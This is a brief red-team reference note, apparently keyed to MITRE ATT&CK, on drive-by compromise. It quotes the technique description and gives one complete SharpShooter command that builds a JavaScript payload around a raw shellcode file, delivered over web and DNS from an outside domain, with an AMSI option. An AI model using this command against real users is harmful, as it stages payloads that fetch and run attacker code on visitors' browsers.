[T1608: Stage Capabilities](https://cmndcntrl.notion.site/T1608-Stage-Capabilities-aaf15ddf016e4906b93b2194e87f43dc)
[T1190: Exploit Public-Facing Application](https://cmndcntrl.notion.site/T1190-Exploit-Public-Facing-Application-5b073ad5593c48b3997a89b31834d2c6)
Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring Application Access Token.
python3 [SharpShooter.py](<http://sharpshooter.py/>) --dotnetver 4 --payload js --output run-init --delivery both --web '<https://attck.community/Initial> Access/run-init.js' --dns attck.community --rawscfile cs-443.bin --refs mscorlib.dll --namespace runner --entrypoint main --amsi amsienable